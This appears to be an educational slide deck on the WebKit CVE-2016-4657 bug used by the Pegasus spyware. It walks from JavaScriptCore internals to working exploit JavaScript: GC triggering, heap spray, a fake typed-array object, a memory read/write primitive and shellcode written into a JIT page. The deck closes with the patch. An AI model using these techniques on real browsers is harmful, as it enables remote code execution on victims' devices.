Pegasus
WebKit JS engine exploit
Pegasus spyware
- Spyware sold by the Israeli cyberarms firm NSO Group
- Infects iOS and Android devices
- Discovered in 2016 (iOS) and 2017 (Android)
- Sold to authorized governments
- Gives almost unrestricted access to a phone
Attack vector on iOS
WebKit engine concepts
JS/CPP/Binary representations
JSValue representation
- All basic types stores in 64 bits, special encoding
Source/JavaScriptCore/runtime/JSCJSValue.h
The top 16-bits denote the type of the encoded JSValue:
Pointer { 0000:PPPP:PPPP:PPPP
/ 0001:****:****:****
Double { ...
\ FFFE:****:****:****
Integer { FFFF:0000:IIII:IIII
- Possible thanks to:
- Canonical virtual address (only 48-bits actually used)
- Unused NaN space in the IEEE754 floating-point numbers
- After some manipulation no double-precision value will start with the pattern 0x0000 or 0xFFFF
- Pointer range has special (non-pointer) values:
Source/JavaScriptCore/runtime/JSCJSValue.h
False: 0x06
True: 0x07
Undefined: 0x0a
Null: 0x02
-
Example JS array:
const arr = [1,2,true,false,null,{}];
Memory representation:
(gdb) x/6xg 0x00007f37a3550060
0x7f37a3550060: 0xffff000000000001 0xffff000000000002
0x7f37a3550070: 0x0000000000000007 0x0000000000000006
0x7f37a3550080: 0x0000000000000002 0x00007f37a31d7f00
JSObject representation
- Stored as pointer in JSValue
- Stored on heap - inherits from JSCell
- 4 bytes: Structure id - meta class id
- 1 byte: Indexing type - continues, not-indexed, Int32Shape, ...
- 1 byte: JS type - basic type info
- 1 byte: Cell state - GC state: black, gray, white
- Stores property values and names in butterfly array
- Pointer to buttefly points to the middle of array
- On the right wing (positive indexes) - values
- On the left wing (negative indexes) - names
Garbage collector
- Variation on mark and sweep algorithm
- Special logic for variables on thread stack
- On GC trigger, store thread execution context
- general registers, stack/base pointer
- utilize low level setjmp function
- Scan the stack and register for potential pointers
- If valid pointer to heap cell is found - mark it
- As a result no special logic is needed in C++ code for:
- C++ stack variables holding JS VM pointers
- Assembly code holding JS VM pointers
- JIT compiler generated code
MarkedSet
- What happens if we exceed the buffer inline capacity?
- The values are moved to heap with extended capacity
- Since values are no longer kept on stack they will not be automatically protected against GC
- Such a MarkedArgumentBuffer must be added to global set of buffer called MarkedSet
m_markListSet = std::make_unique<HashSet<MarkedArgumentBuffer*>>();
- GC will include the set when running the marking phase
- Performed by function called slowAppend
Source/JavaScriptCore/runtime/ArgList.h
class MarkedArgumentBuffer {
// ..
void append(JSValue v)
{
if (m_size >= m_capacity)
return slowAppend(v);
slotFor(m_size) = JSValue::encode(v);
++m_size;
}
// ...
};
WebKit CVE-2016-4657
- Bug in slowAppend function
-
WebKit in Apple iOS before 9.3.5 allows remote attackers to execute arbitrary
code or cause a denial of service (memory corruption) via a crafted web site.
Source/JavaScriptCore/runtime/ArgList.cpp
void MarkedArgumentBuffer::slowAppend(JSValue v)
{
int newCapacity = (Checked(m_capacity) * 2).unsafeGet();
size_t size = (Checked(newCapacity)*sizeof(EncodedJSValue)).unsafeGet();
EncodedJSValue* newBuffer = static_cast(fastMalloc(size));
for (int i = 0; i < m_capacity; ++i)
newBuffer[i] = m_buffer[i];
if (EncodedJSValue* base = mallocBase())
fastFree(base);
m_buffer = newBuffer;
m_capacity = newCapacity;
slotFor(m_size) = JSValue::encode(v);
++m_size;
if (m_markSet)
return;
// As long as our size stays within our Vector's inline
// capacity, all our values are allocated on the stack, and
// therefore don't need explicit marking. Once our size exceeds
// our Vector's inline capacity, though, our values move to the
// heap, where they do need explicit marking.
for (int i = 0; i < m_size; ++i) {
Heap* heap = Heap::heap(JSValue::decode(slotFor(i)));
if (!heap)
continue;
m_markSet = &heap->markListSet();
m_markSet->add(this);
break;
}
Source/JavaScriptCore/heap/HeapInlines.h
inline Heap* Heap::heap(const JSValue v)
{
if (!v.isCell())
return 0;
return heap(v.asCell());
}
Source/JavaScriptCore/runtime/JSCJSValueInlines.h
inline bool JSValue::isCell() const
{
return !(u.asInt64 & TagMask);
}
- To sum up:
- If we fill marked buffer with immidiate values up to its capacity
then another appended value will trigger slowAppend
- If this value is also immidiate then
- marked buffer values will be moved to heap
- marked set will not be assigned
- After that any value append to marked buffer (including pointers)
will also not trigger assignment of marked set until we reach new capacity limit
- As a result new pointers properties will not be protected from GC anymore
- To take advantage of this bug we need a function that
- uses marked buffer for securing temporary variables
- can be called directly from JS
- allows us to trigger GC for values that should be protected
by marked buffer (but in reality are not protected)
Object.defineProperties(obj, props)
- Defines new or modifies existing properties directly on an object, returning the object.
- Has two loops:
- first validated the props, stores the values in vector and adds them to marked buffer
- second assigned the values to a obj object
Source/JavaScriptCore/runtime/ObjectConstructor.cpp
static JSValue defineProperties(/* ... */)
{
// ...
size_t numProperties = propertyNames.size();
Vector descriptors;
MarkedArgumentBuffer markBuffer;
for (size_t i = 0; i < numProperties; i++) {
JSValue prop = properties->get(exec, propertyNames[i]);
if (exec->hadException()) return jsNull();
PropertyDescriptor descriptor;
if (!toPropertyDescriptor(exec, prop, descriptor)) return jsNull();
descriptors.append(descriptor);
// Ensure we mark all the values that we're accumulating
if (descriptor.isDataDescriptor() && descriptor.value())
markBuffer.append(descriptor.value());
// ...
}
for (size_t i = 0; i < numProperties; i++) {
Identifier propertyName = propertyNames[i];
if (exec->propertyNames().isPrivateName(propertyName))
continue;
object->methodTable(exec->vm())->defineOwnProperty(
object, exec, propertyName, descriptors[i], true);
if (exec->hadException())
return jsNull();
}
return object;
}
- If GC runs
- ... after first loop and
- ... before second loop complition
- ... then we will be assigning values that might be already stale
How to trigger the bug?
Garbage collector tool
// GC tools
const pressure = new Array(100);
function forceGC() {
for (var i = 0; i < pressure.length; i++) {
pressure[i] = new Uint32Array(0x10000);
}
for (var i = 0; i < pressure.length; i++) {
pressure[i] = 0;
}
}
function go_() {
forceGC()
// trigger
}
forceGC();
setTimeout(go_, 200);
The trigger function
function go_() {
forceGC();
// trigger
let arr = new Array(0x100);
arr[0] = 1;
arr[1] = 2;
let not_number = {};
not_number.toString = function() {
arr = null;
props["stale"]["value"] = null;
forceGC();
return 10;
};
let props = {
p0: { value: 0 }, p1: { value: 1 }, p2: { value: 2 },
p3: { value: 3 }, p4: { value: 4 }, p5: { value: 5 },
p6: { value: 6 }, p7: { value: 7 }, p8: { value: 8 },
length: { value: not_number },
stale: { value: arr },
after: { value: 777 }
};
let target = [];
Object.defineProperties(target, props);
}
Source/JavaScriptCore/runtime/JSArray.cpp
bool JSArray::defineOwnProperty(/* ... */)
{
JSArray* array = jsCast(object);
// 3. If P is "length", then
if (propertyName == exec->propertyNames().length) {
// ...
// b. Let newLenDesc be a copy of Desc.
// c. Let newLen be ToUint32(Desc.[[Value]]).
unsigned newLen = descriptor.value().toUInt32(exec);
// ..
}
// ...
}
Source/JavaScriptCore/runtime/JSObject.cpp
double JSObject::toNumber(ExecState* exec) const
{
JSValue primitive = toPrimitive(exec, PreferNumber);
if (exec->hadException()) // should be picked up soon in Nodes.cpp
return 0.0;
return primitive.toNumber(exec);
}
Source/JavaScriptCore/runtime/JSObject.h
inline JSValue JSObject::toPrimitive(ExecState* exec,
PreferredPrimitiveType preferredType) const
{
return methodTable()->defaultValue(this, exec, preferredType);
}
Source/JavaScriptCore/runtime/JSObject.cpp
JSValue JSObject::defaultValue(/* ... */)
{
// ...
JSValue value = callDefaultValueFunction(
exec, object, exec->propertyNames().valueOf);
if (value)
return value;
value = callDefaultValueFunction(
exec, object, exec->propertyNames().toString);
if (value)
return value;
// ...
}
How to exploit the bug?
- Heap spray to take control over deallocated memory
let bufs = new Array(10000);
function gc_and_heap_spray() {
if (bufs[0]) return;
for (var i = 0; i < 4; i++) {
forceGC();
}
for (i = 0; i < bufs.length; i++) {
bufs[i] = new Uint32Array(0x100 * 2)
for (k = 0; k < bufs[i].length;) {
bufs[i][k++] = 0x41414141;
bufs[i][k++] = 0xffff0000;
}
}
}
- How to find which array (if any) overlaps with deallocated memory?
let stale = target.stale;
stale[0] += 0x101;
for (i = 0; i < bufs.length; i++) {
for (k = 0; k < bufs[0].length; k++) {
if (bufs[i][k] == 0x41414242) {
// GOT IT
}
}
}
What's next?
- We have two arrays pointing to same memory
- First array (stale) has limited size (2 in our case)
- We can store any JSValue in this array
- First arrray points to middle of 2nd larger array (bufs[i][k])
- Also limited size (0x100)
- We can ready/write Uint32 binary(!) data using this array
- Both arrays are to small to access any interesting data
- But we can leak some small data :)
const obj = {a:1, b:2, c:3, d:4};
for (i = 0; i < bufs.length; i++) {
for (k = 0; k < bufs[0].length; k++) {
if (bufs[i][k] == 0x41414242) {
// GOT IT
stale[0] = obj;
alert(bufs[i][k+1].toString(16) + bufs[i][k+0].toString(16));
}
}
}
- ... and there goes ASLR protection :)
- We can not only leak but also modify the pointer
- Let's see small object under debugger
const obj = {a:1, b:2, c:3, d:4};
(gdb) x/6xg 0x7f6d6f9d3f10
0x7f6d6f9d3f10: 0x0100160000000051 0x0000000000000000
0x7f6d6f9d3f20: 0xffff000000000001 0xffff000000000002
0x7f6d6f9d3f30: 0xffff000000000003 0xffff000000000004
- Object binary layout
- JSCell - 64-bits, including structured id (0x51)
- Butterfly pointer - 64-bits, NULL in our case
- Inline object storage - 64-bits for each of our property
- Now, how does Uint32Array looks under the hood
const u32arr = new Uint32Array(0x10);
u32arr[0] = 0x11223344;
u32arr[1] = 0x55667788;
u32arr[2] = 0x99aabbcc;
u32arr[3] = 0xddeeff00;
(gdb) x/4xg 0x7fee27ba9080
0x7fee27ba9080: 0x0118260000000170 0x0000000000000000
0x7fee27ba9090: 0x00007fedf98b7160 0x0000000000000010
(gdb) x/4xg 0x00007fedf98b7160
0x7fedf98b7160: 0x5566778811223344 0xddeeff0099aabbcc
0x7fedf98b7170: 0x0000000000000000 0x0000000000000000
- We have:
- JSCell - 64 bits, including structure ID (0x170)
- Butterfly - 64 bits, NULL for this type
- Pointer to raw unsigned int[] raw array
- Size of the array (0x10)
const obj = {
'a': u2d(0x170, 0), // JSCell (with structure ID)
'b': u2d(0, 0), // butterfly
'c': smsh, // pointer
'd': u2d(0x100, 0) // length
};
- Let's look on our obj object
(gdb) x/6xg 0x7f048759f4c0
0x7f048759f4c0: 0x01001600000000c8 0x0000000000000000
0x7f048759f4d0: 0x0001000000000170 0x0001000000000000
0x7f048759f4e0: 0x00007f04635b6660 0x0001000000000100
- Our fake object is ready - let's move the pointer
stale[0] = obj;
bufs[i][k] += 0x10;
- Now we have our fake object reference in stale[0]
- The fake object gives us access to bits of smsh array
- Using stale[0][6] we can change size if smsh array
- Using stale[0][4] we can change low bits of of uint32_t* pointer
- Using stale[0][5] we can change high bits of of uint32_t* pointer
stale[0] = obj;
bufs[i][k] += 0x10;
stale[0][6] = 0xffffffff;
if (smsh.length == 0xffffffff) {
// Got a very large smash array
const mem = new memory(stale[0], smsh);
}
- How to make sure we guess the correct structure ID?
- Before to exploit:
for (let j=0; j<0x100; j++) {
let obj = new Uint32Array(0x10);
obj['x' + j] = j;
}
- Then we can build a try loop:
const obj = {
'a': u2d(0x170, 0), // JSCell (with structure ID)
'b': u2d(0, 0), // butterfly
'c': smsh, // pointer
'd': u2d(0x100, 0) // length
};
stale[0] = obj;
bufs[i][k] += 0x10;
let tag = 0x160;
while (!(stale[0] instanceof Uint32Array) && tag < 0x180) {
obj['a'] = u2d(tag++, 0);
}
- We can leverage that to build memory r/w primitive
// Uint32Array memory layout
const ADDR_LOW = 4;
const ADDR_HIGH = 5;
const LEN = 6;
// memory read/write primitive
class memory {
constructor(stale_arr, smash_arr) {
this.stale = stale_arr;
this.smash = smash_arr
this.oldlo = this.stale[ADDR_LOW];
this.oldhi = this.stale[ADDR_HIGH];
}
read4(low, hi) {
this.stale[ADDR_LOW] = low;
this.stale[ADDR_HIGH] = hi;
let ret = this.smash[0];
this.stale[ADDR_LOW] = this.oldlo;
this.stale[ADDR_HIGH] = this.oldhi;
return ret;
}
read8(low, hi) {
return [this.read4(low, hi), this.read4(low+4, hi)];
}
write4(low, hi, val) {
this.stale[ADDR_LOW] = low;
this.stale[ADDR_HIGH] = hi;
this.smash[0] = val;
this.stale[ADDR_LOW] = this.oldlo;
this.stale[ADDR_HIGH] = this.oldhi;
}
}
Data execution protection
#include <stdio.h>
int main(int argc, char *argv[]) {
unsigned char code[] = {
0x48, 0x83, 0xec, 0x04, // sub $0x4,%rsp
0x48, 0x31, 0xc0, // xor %rax,%rax
0x48, 0x31, 0xff, // xor %rdi,%rdi
0x48, 0x31, 0xd2, // xor %rdx,%rdx
0xc7, 0x04, 0x24, 0x48, 0x69, 0x0a, 0x00, // movl $0x000a6948,(%rsp)
// [0x000a6948 == "Hi\n\0"]
0x66, 0xbf, 0x01, 0x00, // mov $0x1,%di
0x48, 0x8d, 0x34, 0x24, // lea (%rsp),%rsi
0x66, 0xba, 0x04, 0x00, // mov $0x4,%dx
0x66, 0xb8, 0x01, 0x00, // mov $0x1,%ax
0x0f, 0x05, // syscall
0x48, 0x83, 0xc4, 0x04, // add $0x4,%rsp
0xc3 // retq
};
( (void (*)()) &code[0])();
return 0;
}
- Program most likely will crush
- Memory pages have different access bits set
| Segment |
RW |
X |
| Stack |
Yes |
Yes/No |
| Heap |
Yes |
No |
| Data |
Yes |
No |
| BSS |
Yes |
No |
| Code |
No |
Yes |
Data execution protection
- Memory pages marked with NX-bit
- Executing code from such page triggers SEGV
- Can't execute code from stack (configurable)
- Can't execute code from heap
- But bypassing NX-bit with browsers is trivial thanks to JIT compiler
- There is only one more thing missing - memory region with 'x' bit
// JIT compiled function
let trycatch = "";
for (let z = 0; z < 0x2000; z++) trycatch += "try{} catch(e){}; ";
let fc = new Function(trycatch);
for (let z = 0; z < 0x1000; z++) fc(); // JIT compile it
const fcp = fc;
(gdb) x/8xg 0x7f5d8898abc0
0x7f5d8898abc0: 0x000a180000000144 0x0000000000000000
0x7f5d8898abd0: 0x00007f5d889e2900 0x00007f5d88987260
0x7f5d8898abe0: 0x0000000000000000 0x0000000000000000
0x7f5d8898abf0: 0x0100160000000252 0x0000000000000000
(gdb) x/8xg 0x00007f5d88987260
0x7f5d88987260: 0x00200e0000000010 0xffffffff00000001
0x7f5d88987270: 0x00007f5de6567000 0x0000000000000000
0x7f5d88987280: 0x0000000000000000 0x0000000000000000
0x7f5d88987290: 0xffffffff00000000 0x0000000200000001
(gdb) x/8xg 0x00007f5de6567000
0x7f5de6567000: 0x00007f5df96f9930 0x00015f0400000002
0x7f5de6567010: 0x00007f5dcbe48680 0x00007f5d7240b940
0x7f5de6567020: 0x00007f5dcbe48741 0x0000000000000000
0x7f5de6567030: 0x00007f5de6538190 0x0000000500000005
(gdb) x/2i 0x00007f5dcbe48680
0x7f5dcbe48680: push %rbp
0x7f5dcbe48681: mov %rsp,%rbp
[maciek@localhost ~]$ sudo cat /proc/4832/maps
7f5d8bdfb000-7f5d8bffb000 ---p 0002f000 fd:00 134953 /usr/lib64/epiphany/..
7f5d8bffb000-7f5d8bffd000 r--p 0002f000 fd:00 134953 /usr/lib64/epiphany/..
7f5d8bffd000-7f5d8bffe000 rw-p 00031000 fd:00 134953 /usr/lib64/epiphany/..
7f5d8bffe000-7f5d8bfff000 ---p 00000000 00:00 0
7f5d8bfff000-7f5d8c007000 rwxp 00000000 00:00 0
7f5d8c007000-7f5dcbe48000 ---p 00000000 00:00 0
7f5dcbe48000-7f5dcbfff000 rwxp 00000000 00:00 0 <---- HERE
7f5dcbfff000-7f5dcc000000 ---p 00000000 00:00 0
7f5dcc000000-7f5dcc022000 rw-p 00000000 00:00 0
7f5dcc022000-7f5dd0000000 ---p 00000000 00:00 0
7f5dd0000000-7f5dd0022000 rw-p 00000000 00:00 0
7f5dd0022000-7f5dd4000000 ---p 00000000 00:00 0
7f5dd41fc000-7f5dd41fd000 r-xp 00000000 fd:00 402095 /usr/lib64/webkit2gtk..
7f5dd41fd000-7f5dd43fd000 ---p 00001000 fd:00 402095 /usr/lib64/webkit2gtk..
7f5dd43fd000-7f5dd43fe000 r--p 00001000 fd:00 402095 /usr/lib64/webkit2gtk..
if (smsh.length == 0xffffffff) {
const mem = new memory(stale[0], smsh);
// leak function ptr
stale[1] = fc;
const [lo0, hi0] = [bufs[i][k+2], bufs[i][k+3]];
const [lo1, hi1] = mem.read8(lo0+0x18, hi0);
const [lo2, hi2] = mem.read8(lo1+0x10, hi1);
const [lo3, hi3] = mem.read8(lo2+0x10, hi2);
run_payload(mem, lo3, hi3);
}
57 push %rdi
56 push %rsi
52 push %rdx
50 push %rax
6a 00 pushq $0x0
48 b8 48 69 20 74 68 movabs 'Hi there',%rax
65 72 65
50 push %rax
bf 01 00 00 00 mov $0x1,%edi ; stdout
48 89 e6 mov %rsp,%rsi ; &'Hi there'
ba 08 00 00 00 mov $0x8,%edx ; length
b8 01 00 00 00 mov $0x1,%eax ; syscall write
0f 05 syscall
58 pop %rax
58 pop %rax
58 pop %rax
5a pop %rdx
5e pop %rsi
5f pop %rdi
c3 retq
function run_payload(mem, jitfp, hi) {
let code = [
0x50525657,
0xb848006a,
0x74206948,
0x65726568,
0x0001bf50,
0x89480000,
0x0009bae6,
0x01b80000,
0x0f000000,
0x58585805,
0xc35f5e5a
];
for (let c of code) {
mem.write4(jitfp, hi, c);
jitfp+=4;
}
fc();
location.href = 'https://google.pl';
}
- Let's run the web page ...
[maciek@pc ~]$ epiphany hack.html
Hi there
... and this is just the first step
- Exploitation of Safari (CVE-2016-4657)
- KASLR Bypass
- Environment Setup and Platform Determination
- Kernel Location Disclosure (CVE-2016-4655)
- Establishing Kernel Read/Write Primitives
- Establishing a Kernel Execute Primitive
Privilege Escalation and Activating the Jailbreak Binary
- Kernel memory corruption (CVE-2016-4656)
- System Modification for Privilege Escalation
- Disabling Code Signing
- Remounting root fs for writing
- Clean up history/cache
Persistence mechanism
Fixed a potential bug in MarkedArgumentBuffer
void MarkedArgumentBuffer::addMarkSet(JSValue v) {
if (m_markSet) return;
Heap* heap = Heap::heap(v);
if (!heap)
return;
m_markSet = &heap->markListSet();
m_markSet->add(this);
}
void MarkedArgumentBuffer::slowAppend(JSValue v) {
if (m_size >= m_capacity) expandCapacity();
slotFor(m_size) = JSValue::encode(v);
++m_size;
addMarkSet(v);
}
Thank you
